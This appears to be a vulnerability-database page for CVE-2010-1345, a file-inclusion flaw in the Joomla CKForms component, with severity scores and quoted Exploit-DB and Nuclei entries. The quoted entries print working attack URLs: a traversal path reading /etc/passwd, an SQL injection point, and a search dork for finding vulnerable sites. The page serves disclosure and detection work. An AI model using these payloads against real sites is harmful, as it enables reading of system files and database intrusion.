CVE-2010-1345
published 2010-04-09CVE-2010-1345: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a…
PriorityP340medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
16.87%
96.7th percentile
Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cookex | com_ckforms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Cookex Agency CKForms - Local File Inclusion
exploitdb·2010-11-08
CVE-2010-1345 Joomla! Component Cookex Agency CKForms - Local File Inclusion
Joomla! Component Cookex Agency CKForms - Local File Inclusion
---
####################################################################
>>>>> Author : altbta [[email protected]]
>>>>> Home : www.v4-team.com/cc
>>>>> Script : Joomla Component com_ckforms
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_ckforms"
http://extensions.joomla.org/extensions/contacts-and-feedback/forms/4939
####################################################################
===[ Exploit ]=== [LFI]
http://site/index.php?option=com_ckforms&controller=[LFI]
http://site.com/index.php?option=com_ckforms&controller=../../../.
./../../../../../../etc/passwd%00
####################################################################
RxH & ab0-3th4b
Exploit-DB
Joomla! Component com_ckforms - Multiple Vulnerabilities
exploitdb·2010-03-17
CVE-2010-1345 Joomla! Component com_ckforms - Multiple Vulnerabilities
Joomla! Component com_ckforms - Multiple Vulnerabilities
---
####################################################################
>>>>> Author : altbta [[email protected]]
>>>>> Home : www.v4-team.com/cc
>>>>> Script : Joomla Component com_ckforms
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_ckforms"
####################################################################
===[ Exploit ]=== [LFI]
http://site/index.php?option=com_ckforms&controller=[LFI]
===[ Exploit ]=== [sql]
http://site/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2[sql]
####################################################################
RxH & ab0-3th4b
Nuclei
Joomla! Component Cookex Agency CKForms - Local File Inclusion
nuclei·CVSS 5.0
CVE-2010-1345 [MEDIUM] Joomla! Component Cookex Agency CKForms - Local File Inclusion
Joomla! Component Cookex Agency CKForms - Local File Inclusion
A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1345
info:
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information.
remediation: Upgrade t
http://packetstormsecurity.org/1003-exploits/joomlackforms-lfisql.txthttp://secunia.com/advisories/38976http://www.exploit-db.com/exploits/11785http://www.osvdb.org/63031http://packetstormsecurity.org/1003-exploits/joomlackforms-lfisql.txthttp://secunia.com/advisories/38976http://www.exploit-db.com/exploits/11785http://www.osvdb.org/63031
2010-04-09
Published